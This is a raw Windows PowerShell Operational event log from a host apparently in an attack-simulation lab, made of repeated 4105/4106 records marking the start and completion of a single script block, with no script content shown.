Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467914
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467913
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467912
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467911
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467910
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467909
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467908
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467907
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467906
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467905
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467904
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467903
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467902
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467901
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467900
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467899
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467898
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467897
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467896
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467895
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467894
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467893
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467892
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467891
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467890
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467889
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467888
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467887
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467886
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467885
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467884
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467883
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467882
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467881
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467880
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467879
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467878
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467877
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467876
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467875
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467874
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467873
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467872
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467871
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467870
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467869
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467868
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467867
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467866
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467865
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467864
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467863
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467862
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467861
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467860
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
